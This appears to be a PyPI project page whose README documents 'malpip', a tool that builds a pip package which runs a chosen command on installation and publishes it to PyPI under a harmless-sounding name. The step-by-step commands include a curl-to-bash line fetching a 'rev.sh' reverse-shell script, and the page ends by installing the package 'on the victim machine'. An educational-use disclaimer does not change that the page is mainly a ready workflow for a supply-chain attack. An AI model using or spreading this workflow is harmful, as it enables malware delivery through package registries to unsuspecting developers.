hamburgesr

A test package to demonstrate malicious pip packages


License
MIT
Install
pip install hamburgesr==1.0.0

Documentation

malpip

Tool that creates a malicious pip package that runs your command during installation.

Prerequisite

Create an account on https://pypi.org

Installation

  1. Clone repository and set permissions.
git clone https://github.com/thegoodhackertv/malpip.git
cd malpip
sudo chmod +x malpip.sh
  1. Install dependencies.
sudo ./malpip install
  1. Set the command to be executed.
echo "curl -s http://localhost/rev.sh | bash" > command.txt
  1. Create malicious project. You will be asked for your pypi credentials to upload the project.
./malpip create nothingmalicious command.txt
  1. Install the package on the victim machine and your command will be executed.
pip install nothingmalicious

Useful Resources

Disclaimer

Usage of these scripts for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Support

patreon buymeacoffe